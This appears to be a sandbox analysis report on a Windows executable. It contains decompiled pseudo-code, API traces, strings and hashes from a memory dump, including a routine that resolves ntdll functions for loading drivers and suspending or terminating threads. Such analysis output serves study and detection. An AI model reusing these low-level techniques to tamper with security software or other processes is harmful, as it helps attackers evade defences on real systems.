Opcode Fuzzy Hash: 8e4c376cf7c570f1656cc04afb23f0be4d71cb0539670ea516d7700e7cbaecd3
Instruction Fuzzy Hash: FFB012B52100014BCB1807349D4508D35905F44631B31873CB037D0CF0E730CCA8BA00

Uniqueness

Uniqueness Score: -1.00%

Function 004048DA, Relevance: 1.3, APIs: 1, Instructions: 59
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E004048DA(void* __ecx, void* __edx, intOrPtr* _a4, intOrPtr _a8, void** _a12) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t20;
				void* _t22;
				intOrPtr _t25;
				intOrPtr _t29;
				intOrPtr _t31;
				void* _t38;
				void** _t40;
				intOrPtr* _t47;

				_t38 = __edx;
				_t34 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t44 = _a4;
				_t40 = _a12;
				_t31 = 0;
				 *((intOrPtr*)(_a4 + 0x248)) = _t40;
				_v8 = 0;
				if( *((intOrPtr*)(_t40 + 0x428)) <= 0) {
					L3:
					_t20 = 0;
					L4:
					if(_t20 != 0) {
						_t22 = E00404489(_t44 + 0x14, _t34, _t38, _t40, _t20); // executed
						_t53 = _t22;
						if(_t22 != 0) {
							E00406729( *((intOrPtr*)( *((intOrPtr*)(_t40 + 0x418)) + 0xec)), _t44 + 4);
							_t47 = _a4;
							_t25 = E00404689(_a12, _t53,  *((intOrPtr*)(_t47 + 0x220)),  *((intOrPtr*)(_t44 + 4))); // executed
							 *_t47 = _t25;
							 *((intOrPtr*)(_t47 + 0x10)) = 1;
							_v8 = 1;
						}
					}
					return _v8;
				} else {
					goto L1;
				}
				while(1) {
					L1:
					_t29 = E00403F2B(_t31, _t40 + 0x41c);
					_push(_a8);
					_v12 = _t29;
					L0040E03E();
					_t34 = _t29;
					if(_t29 == 0) {
						break;
					}
					_t31 = _t31 + 1;
					if(_t31 <  *((intOrPtr*)(_t40 + 0x428))) {
						continue;
					}
					goto L3;
				}
				_t20 = _v12;
				goto L4;
			}

0x004048da
0x004048da
0x004048dd
0x004048de
0x004048e1
0x004048e5
0x004048e8
0x004048ea
0x004048f6
0x004048f9
0x00404923
0x00404923
0x00404925
0x00404927
0x0040492e
0x00404933
0x00404935
0x00404946
0x0040494d
0x00404959
0x0040495e
0x00404963
0x00404966
0x00404966
0x00404935
0x00404970
0x00000000
0x00000000
0x00000000
0x004048fb
0x004048fb
0x00404903
0x00404908
0x0040490b
0x0040490f
0x00404917
0x00404918
0x00000000
0x00000000
0x0040491a
0x00404921
0x00000000
0x00000000
0x00000000
0x00404921
0x00404973
0x00000000

APIs

_wcsicmp.MSVCRT ref: 0040490F

Memory Dump Source

Source File: 0000000B.00000002.385462533.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.385454430.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.385500949.000000000040F000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.385521248.0000000000412000.00000004.00020000.sdmp Download File
Associated: 0000000B.00000002.385532462.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: _wcsicmp
String ID:
API String ID: 2081463915-0
Opcode ID: 1a5aa7950c8524b605f159770a309709ad0bf62fba3d30ff973a537a5b72f3ad
Instruction ID: fdc747c80fe88fd67bd043bcbe7cc9eb3f50563aa05d6d30472a65970944665d
Opcode Fuzzy Hash: 1a5aa7950c8524b605f159770a309709ad0bf62fba3d30ff973a537a5b72f3ad
Instruction Fuzzy Hash: 9D115EF5600205AFC710DF79C88099AB7B8FF48354F10453EEA55E3240D734A9508BA8

Uniqueness

Uniqueness Score: -1.00%

Function 00403FDE, Relevance: 1.3, APIs: 1, Instructions: 39
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00403FDE(void** __eax, void* __eflags, WCHAR* _a4) {
				void* __ecx;
				void* __esi;
				intOrPtr _t11;
				void* _t14;
				intOrPtr _t15;
				intOrPtr* _t16;
				intOrPtr* _t22;

				_t22 = __eax;
				 *(__eax + 0x414) =  *(__eax + 0x414) & 0x00000000;
				E0040405E(__eax);
				_t11 = E00405338(_a4);
				 *_t22 = _t11;
				if(_t11 == 0xffffffff) {
					L7:
					 *((intOrPtr*)(_t22 + 0x414)) = GetLastError();
					L8:
					return 0;
				}
				_t14 = E00405E43(_t22 + 4, _t11, _t22 + 4, 0x400); // executed
				if(_t14 == 0) {
					goto L7;
				}
				_t15 =  *((intOrPtr*)(_t22 + 0x418));
				if( *((intOrPtr*)(_t15 + 4)) == 0x89abcdef) {
					_t16 = _t15 + 0xec;
					__eflags =  *_t16;
					if(__eflags == 0) {
						 *_t16 = 0x1000;
					}
					E00404541(__eflags, _t22); // executed
					return 1;
				}
				 *((intOrPtr*)(_t22 + 0x414)) = 0xfff1;
				goto L8;
			}

0x00403fe0
0x00403fe2
0x00403fe9
0x00403ff2
0x00403ffb
0x00403ffd
0x0040404b
0x00404051
0x00404057
0x00000000
0x00404057
0x00404009
0x00404013
0x00000000
0x00000000
0x00404015
0x00404022
0x00404030
0x00404035
0x00404038
0x0040403a
0x0040403a
0x00404041
0x00000000
0x00404048
0x00404024
0x00000000

APIs

Part of subcall function 0040405E: FindCloseChangeNotification.KERNELBASE(00000000,00403FC6,?,0040BE7E), ref: 00404066

Part of subcall function 00405338: CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,00403FF7,?,?,00000000,00403B9A,?), ref: 0040534A

GetLastError.KERNEL32(?,00000000,00403B9A,?), ref: 0040404B

Part of subcall function 00405E43: ReadFile.KERNELBASE(?,?,?,00000000,00000000,?,?,0040400E,00000000,?,00000400,?,00000000,00403B9A,?), ref: 00405E5A

Memory Dump Source

Source File: 0000000B.00000002.385462533.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.385454430.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.385500949.000000000040F000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.385521248.0000000000412000.00000004.00020000.sdmp Download File
Associated: 0000000B.00000002.385532462.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: File$ChangeCloseCreateErrorFindLastNotificationRead
String ID:
API String ID: 4176926985-0
Opcode ID: 28e05b3785312bd73728d28a7b4e7de4c452789e56a0673e54d11ff134628f3e
Instruction ID: 1be67c3d07cfbe594be31b534527c337e1243451ed86295bd1db7fefa69627cd
Opcode Fuzzy Hash: 28e05b3785312bd73728d28a7b4e7de4c452789e56a0673e54d11ff134628f3e
Instruction Fuzzy Hash: FD01D1F10016008AD320AB20C805B9376E8DF91315F10893FE3A6F72C1EB7C98818AA9

Uniqueness

Uniqueness Score: -1.00%

Function 00406355, Relevance: 1.3, APIs: 1, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00406355(signed int* __esi) {
				void* _t5;
				signed int* _t7;

				_t7 = __esi;
				_t5 =  *__esi;
				if(_t5 != 0) {
					free(_t5); // executed
					 *__esi =  *__esi & 0x00000000;
				}
				_t7[1] = _t7[1] & 0x00000000;
				_t7[2] = _t7[2] & 0x00000000;
				return _t5;
			}

0x00406355
0x00406355
0x00406359
0x0040635c
0x00406361
0x00406364
0x00406365
0x00406369
0x0040636d

APIs

free.MSVCRT(00000000,004065BB,74784E00,?,00000000), ref: 0040635C

Memory Dump Source

Source File: 0000000B.00000002.385462533.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.385454430.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.385500949.000000000040F000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.385521248.0000000000412000.00000004.00020000.sdmp Download File
Associated: 0000000B.00000002.385532462.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: 087bb4fc264830983fe200f1886ef8bdbde26bdfe1ad20cb23c944558e33102c
Instruction ID: 3b7e158b20e84301f479c6044b2c5b8c75456169b8cefd1b15b644340405c36b
Opcode Fuzzy Hash: 087bb4fc264830983fe200f1886ef8bdbde26bdfe1ad20cb23c944558e33102c
Instruction Fuzzy Hash: 8FC04C72910B019BE7349F26D449766B3E4BF1073BF618C2DA4D5914C1DBBCE494CA18

Uniqueness

Uniqueness Score: -1.00%

Function 00403F55, Relevance: 1.3, APIs: 1, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00403F55(void** __esi) {
				void* _t5;
				signed int* _t7;

				_t7 = __esi;
				_t5 =  *__esi;
				if(_t5 != 0) {
					free(_t5); // executed
				}
				 *_t7 =  *_t7 & 0x00000000;
				_t7[3] = _t7[3] & 0x00000000;
				_t7[1] = _t7[1] & 0x00000000;
				return _t5;
			}

0x00403f55
0x00403f55
0x00403f59
0x00403f5c
0x00403f61
0x00403f62
0x00403f65
0x00403f69
0x00403f6d

APIs

free.MSVCRT(00000000,0040BC79,?,00000000,0040C0A1,/deleteregkey,/savelangfile,?,?,?,?,00000002,?,0040E23C,00000000), ref: 00403F5C

Memory Dump Source

Source File: 0000000B.00000002.385462533.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.385454430.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.385500949.000000000040F000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.385521248.0000000000412000.00000004.00020000.sdmp Download File
Associated: 0000000B.00000002.385532462.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: ca8b33ba02bdd68b061cc876ecb80c5c4dc103e44f57bd864d81743fd2e6ef53
Instruction ID: 3143f4fb3421a8fd8d8aef00c743a9b8e7153b02c0e56cadf99ac6914a485b7f
Opcode Fuzzy Hash: ca8b33ba02bdd68b061cc876ecb80c5c4dc103e44f57bd864d81743fd2e6ef53
Instruction Fuzzy Hash: 48C00272910B019FE7309E26C405B66B7E8AF1073BF918C1D94D5914C1D7BCD4448A14

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0040C41D, Relevance: 45.6, APIs: 13, Strings: 13, Instructions: 57
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040C41D() {
				void* _t1;
				struct HINSTANCE__* _t2;
				_Unknown_base(*)()* _t14;

				if( *0x4132c4 == 0) {
					_t2 = GetModuleHandleW(L"ntdll.dll");
					 *0x4132c4 = _t2;
					 *0x413294 = GetProcAddress(_t2, "NtQuerySystemInformation");
					 *0x413298 = GetProcAddress( *0x4132c4, "NtLoadDriver");
					 *0x41329c = GetProcAddress( *0x4132c4, "NtUnloadDriver");
					 *0x4132a0 = GetProcAddress( *0x4132c4, "NtOpenSymbolicLinkObject");
					 *0x4132a4 = GetProcAddress( *0x4132c4, "NtQuerySymbolicLinkObject");
					 *0x4132a8 = GetProcAddress( *0x4132c4, "NtQueryObject");
					 *0x4132ac = GetProcAddress( *0x4132c4, "NtOpenThread");
					 *0x4132b0 = GetProcAddress( *0x4132c4, "NtClose");
					 *0x4132b4 = GetProcAddress( *0x4132c4, "NtQueryInformationThread");
					 *0x4132b8 = GetProcAddress( *0x4132c4, "NtSuspendThread");
					 *0x4132bc = GetProcAddress( *0x4132c4, "NtResumeThread");
					_t14 = GetProcAddress( *0x4132c4, "NtTerminateThread");
					 *0x4132c0 = _t14;
					return _t14;
				}
				return _t1;
			}

0x0040c424
0x0040c430
0x0040c442
0x0040c454
0x0040c466
0x0040c478
0x0040c48a
0x0040c49c
0x0040c4ae
0x0040c4c0
0x0040c4d2
0x0040c4e4
0x0040c4f6
0x0040c508
0x0040c50d
0x0040c50f
0x00000000
0x0040c514
0x0040c515

APIs

GetModuleHandleW.KERNEL32(ntdll.dll,?,0040C596,?,?,00000000), ref: 0040C430
GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 0040C447
GetProcAddress.KERNEL32(NtLoadDriver), ref: 0040C459
GetProcAddress.KERNEL32(NtUnloadDriver), ref: 0040C46B
GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 0040C47D
GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 0040C48F
GetProcAddress.KERNEL32(NtQueryObject), ref: 0040C4A1
GetProcAddress.KERNEL32(NtOpenThread), ref: 0040C4B3
GetProcAddress.KERNEL32(NtClose), ref: 0040C4C5
GetProcAddress.KERNEL32(NtQueryInformationThread), ref: 0040C4D7
GetProcAddress.KERNEL32(NtSuspendThread), ref: 0040C4E9
GetProcAddress.KERNEL32(NtResumeThread), ref: 0040C4FB
GetProcAddress.KERNEL32(NtTerminateThread), ref: 0040C50D

Strings

NtClose, xrefs: 0040C4B5
NtQueryInformationThread, xrefs: 0040C4C7
ntdll.dll, xrefs: 0040C42B
NtTerminateThread, xrefs: 0040C4FD
NtOpenThread, xrefs: 0040C4A3
NtOpenSymbolicLinkObject, xrefs: 0040C46D
NtLoadDriver, xrefs: 0040C449
NtQuerySymbolicLinkObject, xrefs: 0040C47F
NtUnloadDriver, xrefs: 0040C45B
NtQuerySystemInformation, xrefs: 0040C43C
NtResumeThread, xrefs: 0040C4EB
NtQueryObject, xrefs: 0040C491
NtSuspendThread, xrefs: 0040C4D9

Memory Dump Source

Source File: 0000000B.00000002.385462533.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.385454430.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.385500949.000000000040F000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.385521248.0000000000412000.00000004.00020000.sdmp Download File
Associated: 0000000B.00000002.385532462.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressProc$HandleModule
String ID: NtClose$NtLoadDriver$NtOpenSymbolicLinkObject$NtOpenThread$NtQueryInformationThread$NtQueryObject$NtQuerySymbolicLinkObject$NtQuerySystemInformation$NtResumeThread$NtSuspendThread$NtTerminateThread$NtUnloadDriver$ntdll.dll
API String ID: 667068680-4280973841
Opcode ID: 0eddc1e60b10c18c4745ef63ef14c7ef42ad6bc27fe304210325578cd75792ce
Instruction ID: 58691313bf47f16c5c12281129ebfbb01f3831da172bf8a538c636a3e5316245
Opcode Fuzzy Hash: 0eddc1e60b10c18c4745ef63ef14c7ef42ad6bc27fe304210325578cd75792ce
Instruction Fuzzy Hash: 27119778D41325AECB12BF71AD09ACA7EB1E764B5671084F7A408722F0D6B942A0DF4C

Uniqueness

Uniqueness Score: -1.00%

Function 0040AE4D, Relevance: 1.5, APIs: 1, Instructions: 21
clipboardCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040AE4D(signed int __eax, void* __ecx, void* __edx, void* __esi, void* __eflags) {
				void* __edi;
				int _t11;
				void* _t13;
				void* _t15;
				void* _t17;

				_t15 = __edx;
				_t13 = __ecx;
				_t16 = __esi + 0x6ac;
				E0040637A(__eax | 0xffffffff, __esi + 0x6ac, 0x40f454);
				 *((intOrPtr*)(__esi + 0x6bc)) = 0x4000;
				E0040AE99(_t13, _t15, __esi,  *((intOrPtr*)(__esi + 0x69c)));
				_t17 = E0040636E(_t16);
				_t11 = OpenClipboard( *(__esi + 0x208));
				if(_t11 != 0) {
					return E004054F1(_t17);
				}
				return _t11;
			}

0x0040ae4d
0x0040ae4d
0x0040ae4e
0x0040ae5c
0x0040ae67
0x0040ae72
0x0040ae84
0x0040ae86
0x0040ae8e
0x00000000
0x0040ae96
0x0040ae98

APIs

Part of subcall function 0040637A: wcslen.MSVCRT ref: 0040638D
Part of subcall function 0040637A: memcpy.MSVCRT ref: 004063AC

Part of subcall function 0040AE99: SendMessageW.USER32(?,0000100C,000000FF,00000002), ref: 0040AEEB

OpenClipboard.USER32(?), ref: 0040AE86

Part of subcall function 004054F1: EmptyClipboard.USER32(?,?,0040AE96,00000000), ref: 004054F9
Part of subcall function 004054F1: wcslen.MSVCRT ref: 00405506
Part of subcall function 004054F1: GlobalAlloc.KERNEL32(00002000,00000002,00000000,?,?,?,0040AE96,00000000), ref: 00405516
Part of subcall function 004054F1: GlobalLock.KERNEL32 ref: 00405523
Part of subcall function 004054F1: memcpy.MSVCRT ref: 0040552C
Part of subcall function 004054F1: GlobalUnlock.KERNEL32(00000000), ref: 00405535
Part of subcall function 004054F1: SetClipboardData.USER32 ref: 0040553E
Part of subcall function 004054F1: CloseClipboard.USER32 ref: 0040554E

Memory Dump Source

Source File: 0000000B.00000002.385462533.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.385454430.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.385500949.000000000040F000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.385521248.0000000000412000.00000004.00020000.sdmp Download File
Associated: 0000000B.00000002.385532462.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: Clipboard$Global$memcpywcslen$AllocCloseDataEmptyLockMessageOpenSendUnlock
String ID:
API String ID: 2178300729-0
Opcode ID: 2bf5dca165b34132fb64bb1855b861156878277b56bd8399cb3bfe959ead56f4
Instruction ID: d2c7d0a254bb278864896b88801620e30a707c529b051fe324ebedfb26bf80ea
Opcode Fuzzy Hash: 2bf5dca165b34132fb64bb1855b861156878277b56bd8399cb3bfe959ead56f4
Instruction Fuzzy Hash: F0E0DFB1100B0056C6217736A801B9B76A26F80324B100B3EF8A6B11E2CB3960AA9A49

Uniqueness

Uniqueness Score: -1.00%

Function 0040D12C, Relevance: 49.3, APIs: 25, Strings: 3, Instructions: 265
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E0040D12C(void* __ecx, intOrPtr* __esi, void* __eflags, signed int _a4, intOrPtr _a8, intOrPtr _a12, struct HDC__* _a16, long _a20, signed int _a24, intOrPtr _a28, signed int _a32, long _a36, intOrPtr _a40, struct tagPOINT _a44, intOrPtr _a48, intOrPtr _a52, intOrPtr _a56, struct tagPOINT _a60, intOrPtr _a64, intOrPtr _a68, short _a72, intOrPtr _a76, struct tagRECT _a80, intOrPtr _a84, intOrPtr _a88, intOrPtr _a92, long _a96, struct tagPOINT _a100, intOrPtr _a104, intOrPtr _a108, intOrPtr _a112, struct tagSIZE _a116, struct tagRECT _a124, intOrPtr _a128, intOrPtr _a136, char _a584) {
				signed int _v0;
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v24;
				intOrPtr _v32;
				signed int _v36;
				intOrPtr _v52;
				struct HWND__* _v56;
				struct HWND__* _v60;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				struct HDC__* _t169;
				struct HWND__* _t171;
				intOrPtr _t220;
				void* _t221;
				intOrPtr _t232;
				struct HWND__* _t234;
				void* _t237;
				intOrPtr* _t271;
				signed int _t272;
				signed int _t273;

				_t271 = __esi;
				_t273 = _t272 & 0xfffffff8;
				E0040E340(0x4298, __ecx);
				_a12 =  *((intOrPtr*)( *((intOrPtr*)(__esi + 0x44)) + 0x2e4));
				_t234 = GetDlgItem( *(__esi + 0x10), 0x3e9);
				_a4 = GetDlgItem( *(__esi + 0x10), 0x3e8);
				_a20 = GetWindowLongW(_t234, 0xfffffff0);
				_a24 = GetWindowLongW(_a4, 0xfffffff0);
				_a96 = GetWindowLongW(_t234, 0xffffffec);
				_a36 = GetWindowLongW(_a4, 0xffffffec);
				GetWindowRect(_t234,  &_a100);
				GetWindowRect(_a4,  &_a60);
				MapWindowPoints(0,  *(__esi + 0x10),  &_a100, 2);
				MapWindowPoints(0,  *(__esi + 0x10),  &_a60, 2);
				_t237 = _a108 - _a100.x;
				_a4 = _a4 & 0x00000000;
				_a28 = _a68 - _a60.x;
				_a76 = _a112 - _a104;
				_a40 = _a72 - _a64;
				_t169 = GetDC( *(__esi + 0x10));
				_a16 = _t169;
				if(_t169 == 0) {
					L9:
					_v0 = _v0 & 0x00000000;
					if( *((intOrPtr*)( *((intOrPtr*)(_t271 + 0x44)) + 0x2e0)) <= 0) {
						L12:
						_t171 = GetDlgItem( *(_t271 + 0x10), 1);
						_a36 = _t171;
						GetWindowRect(_t171,  &_a44);
						MapWindowPoints(0,  *(_t271 + 0x10),  &_a44, 2);
						GetClientRect( *(_t271 + 0x10),  &_a124);
						GetWindowRect( *(_t271 + 0x10),  &_a80);
						SetWindowPos( *(_t271 + 0x10), 0, 0, 0, _a88 - _a80.left + 1, _a128 - _a136 - _a48 - _a84 + _a56 + _a92 + _a4 + 0x15, 0x206);
						GetClientRect( *(_t271 + 0x10),  &_a80);
						return SetWindowPos(_a36, 0, _a44.x, _a48 - _a56 - _a84 + _a92 - 5, _a52 - _a44 + 1, _a56 - _a48 + 1, 0x204);
					}
					_a20 = _a20 | 0x10000000;
					_a24 = _a24 | 0x10000000;
					_a8 = _a12 + 0x10;
					do {
						 *((intOrPtr*)( *_t271 + 0x20))(_v0);
						_v24 = E00401551(_t271, _a92, L"STATIC", _a16, _a96, _v0 + _a100.x, _t237, _a72);
						_v52 = E00401551(_t271, _v0, L"EDIT", _v12, _a24, _v32 + _a28, _v8,  *(_t271 + 0x48) * _a4);
						L0040DFD6();
						_t273 = _t273 + 0x10;
						SetWindowTextW(_v56,  &_a72);
						SetWindowTextW(_v60,  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t271 + 0x40))))))(_v68,  &_a584,  &_a72, 0xff, L"%s:", _v60->i));
						_v68 = _v68 + 0x14;
						_v72 = _v72 +  *(_t271 + 0x48) * _v36 +  *((intOrPtr*)(_t271 + 0x4c));
						_v76 = _v76 + 1;
					} while (_v76 <  *((intOrPtr*)( *((intOrPtr*)(_t271 + 0x44)) + 0x2e0)));
					goto L12;
				}
				_t220 = 0;
				_a32 = _a32 & 0;
				_a8 = 0;
				if( *((intOrPtr*)( *((intOrPtr*)(__esi + 0x44)) + 0x2e0)) <= 0) {
					L8:
					_t221 = _t220 - _t237;
					_a28 = _a28 - _t221;
					_a60.x = _a60.x + _t221;
					_t237 = _t237 + _t221;
					ReleaseDC( *(_t271 + 0x10), _a16);
					goto L9;
				}
				_v0 = _a12 + 0x10;
				do {
					if(GetTextExtentPoint32W(_a16,  *_v0, wcslen( *_v0),  &_a116) != 0) {
						_t232 = _a100.x + 0xa;
						if(_t232 > _v8) {
							_v8 = _t232;
						}
					}
					_a16 =  &(_a16->i);
					_v16 = _v16 + 0x14;
				} while (_a16 <  *((intOrPtr*)( *((intOrPtr*)(_t271 + 0x44)) + 0x2e0)));
				_t220 = _v8;
				goto L8;
			}

0x0040d12c
0x0040d12f
0x0040d137
0x0040d155
0x0040d163
0x0040d170
0x0040d17c
0x0040d185
0x0040d191
0x0040d19d
0x0040d1a7
0x0040d1b2
0x0040d1c6
0x0040d1d4
0x0040d1e5
0x0040d1e9
0x0040d1ee
0x0040d1fd
0x0040d209
0x0040d20d
0x0040d215
0x0040d219
0x0040d2b1
0x0040d2b4
0x0040d2c0
0x0040d3d1
0x0040d3d6
0x0040d3e2
0x0040d3e6
0x0040d3f4
0x0040d40b
0x0040d415
0x0040d45b
0x0040d465
0x0040d4a4
0x0040d4a4
0x0040d2d1
0x0040d2e2
0x0040d2e6
0x0040d2ea
0x0040d2f2
0x0040d323
0x0040d352
0x0040d36e
0x0040d373
0x0040d382
0x0040d3a0
0x0040d3b1
0x0040d3b6
0x0040d3ba
0x0040d3c5
0x00000000
0x0040d2ea
0x0040d222
0x0040d224
0x0040d22e
0x0040d232
0x0040d298
0x0040d29c
0x0040d2a1
0x0040d2a5
0x0040d2a9
0x0040d2ab
0x00000000
0x0040d2ab
0x0040d23b
0x0040d23f
0x0040d266
0x0040d26f
0x0040d276
0x0040d278
0x0040d278
0x0040d276
0x0040d27c
0x0040d287
0x0040d28c
0x0040d294
0x00000000

APIs

GetDlgItem.USER32 ref: 0040D159
GetDlgItem.USER32 ref: 0040D165
GetWindowLongW.USER32(00000000,000000F0), ref: 0040D174
GetWindowLongW.USER32(?,000000F0), ref: 0040D180
GetWindowLongW.USER32(00000000,000000EC), ref: 0040D189
GetWindowLongW.USER32(?,000000EC), ref: 0040D195
GetWindowRect.USER32 ref: 0040D1A7
GetWindowRect.USER32 ref: 0040D1B2
MapWindowPoints.USER32 ref: 0040D1C6
MapWindowPoints.USER32 ref: 0040D1D4
GetDC.USER32 ref: 0040D20D
wcslen.MSVCRT ref: 0040D24D
GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 0040D25E
ReleaseDC.USER32 ref: 0040D2AB
_snwprintf.MSVCRT ref: 0040D36E
SetWindowTextW.USER32(?,?), ref: 0040D382
SetWindowTextW.USER32(?,00000000), ref: 0040D3A0
GetDlgItem.USER32 ref: 0040D3D6
GetWindowRect.USER32 ref: 0040D3E6
MapWindowPoints.USER32 ref: 0040D3F4
GetClientRect.USER32 ref: 0040D40B
GetWindowRect.USER32 ref: 0040D415
SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000206), ref: 0040D45B
GetClientRect.USER32 ref: 0040D465
SetWindowPos.USER32(?,00000000,?,?,?,?,00000204), ref: 0040D49D

Strings

%s:, xrefs: 0040D363
STATIC, xrefs: 0040D30D
EDIT, xrefs: 0040D343

Memory Dump Source

Source File: 0000000B.00000002.385462533.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.385454430.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.385500949.000000000040F000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.385521248.0000000000412000.00000004.00020000.sdmp Download File
Associated: 0000000B.00000002.385532462.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$Rect$Long$ItemPointsText$Client$ExtentPoint32Release_snwprintfwcslen
String ID: %s:$EDIT$STATIC
API String ID: 2080319088-3046471546
Opcode ID: c102a7a5600ef86d24e901ec56d59f6fa3db94701319a0c7660b80572fc7c6b1
Instruction ID: af222cd68e1cf1c2961fcc0c9276d13d323a9bd1d9fa968012e99cc026c1ed94
Opcode Fuzzy Hash: c102a7a5600ef86d24e901ec56d59f6fa3db94701319a0c7660b80572fc7c6b1
Instruction Fuzzy Hash: D4B1C171508301AFD720DFA8C985E6BBBF9FF88714F00492DF695962A1D775E8088F16

Uniqueness

Uniqueness Score: -1.00%

Function 0040A742, Relevance: 47.6, APIs: 22, Strings: 5, Instructions: 303
windowregistryCOMMON

Download Yara Rule

C-Code - Quality: 83%

			E0040A742(void* __ecx, void* __eflags, void* __fp0) {
				void* __ebx;
				void* __esi;
				struct HMENU__* _t123;
				struct HWND__* _t125;
				void* _t131;
				intOrPtr _t135;
				intOrPtr _t139;
				void* _t187;
				long _t193;
				void* _t198;
				void* _t200;
				void* _t216;
				long _t218;
				intOrPtr _t220;
				intOrPtr _t221;
				void* _t222;
				int _t225;
				void* _t226;
				intOrPtr* _t228;
				intOrPtr* _t229;
				void* _t231;
				void* _t232;
				intOrPtr* _t233;
				long _t241;

				_t229 = _t231 - 0x78;
				_t232 = _t231 - 0xa4;
				 *((char*)(_t229 - 0x23)) = 1;
				_t187 = __ecx;
				 *(_t229 - 0x2c) = 0;
				 *((intOrPtr*)(_t229 - 0x28)) = 0;
				 *((char*)(_t229 - 0x24)) = 0;
				 *((char*)(_t229 - 0x22)) = 0;
				 *((char*)(_t229 - 0x21)) = 0;
				asm("stosd");
				asm("stosd");
				 *(_t229 - 0x18) = 1;
				 *((intOrPtr*)(_t229 - 0x14)) = 0x9c41;
				 *((char*)(_t229 - 0x10)) = 4;
				 *((char*)(_t229 - 0xf)) = 0;
				 *((char*)(_t229 - 0xe)) = 0;
				 *((char*)(_t229 - 0xd)) = 0;
				asm("stosd");
				asm("stosd");
				 *((intOrPtr*)(_t229 - 4)) = 5;
				 *_t229 = 0x9c44;
				 *((char*)(_t229 + 4)) = 4;
				 *((char*)(_t229 + 5)) = 0;
				 *((char*)(_t229 + 6)) = 0;
				 *((char*)(_t229 + 7)) = 0;
				asm("stosd");
				asm("stosd");
				 *(_t229 + 0x10) = 2;
				 *((intOrPtr*)(_t229 + 0x14)) = 0x9c48;
				 *((char*)(_t229 + 0x18)) = 4;
				 *((char*)(_t229 + 0x19)) = 0;
				 *((char*)(_t229 + 0x1a)) = 0;
				 *((char*)(_t229 + 0x1b)) = 0;
				 *(_t229 + 0x68) =  *(_t229 + 0x68) | 0xffffffff;
				asm("stosd");
				asm("stosd");
				 *((intOrPtr*)(_t229 + 0x24)) = 3;
				 *((intOrPtr*)(_t229 + 0x28)) = 0x9c49;
				 *((char*)(_t229 + 0x2c)) = 4;
				 *((char*)(_t229 + 0x2d)) = 0;
				 *((char*)(_t229 + 0x2e)) = 0;
				 *((char*)(_t229 + 0x2f)) = 0;
				asm("stosd");
				asm("stosd");
				 *((intOrPtr*)(_t229 + 0x38)) = 0;
				 *((intOrPtr*)(_t229 + 0x3c)) = 0x9c4e;
				 *((char*)(_t229 + 0x40)) = 4;
				 *((char*)(_t229 + 0x41)) = 0;
				 *((char*)(_t229 + 0x42)) = 0;
				 *((char*)(_t229 + 0x43)) = 0;
				asm("stosd");
				asm("stosd");
				 *((intOrPtr*)(_t229 + 0x4c)) = 4;
				 *((intOrPtr*)(_t229 + 0x50)) = 0x9c42;
				 *((char*)(_t229 + 0x54)) = 4;
				 *((char*)(_t229 + 0x55)) = 0;
				 *((char*)(_t229 + 0x56)) = 0;
				 *((char*)(_t229 + 0x57)) = 0;
				asm("stosd");
				_t216 = 0x66;
				asm("stosd");
				_t123 = E00406AFA(_t216);
				 *(__ecx + 0x21c) = _t123;
				SetMenu( *(__ecx + 0x208), _t123);
				_t125 = CreateStatusWindowW(0x50000000, 0x40f454,  *(_t187 + 0x208), 0x101);
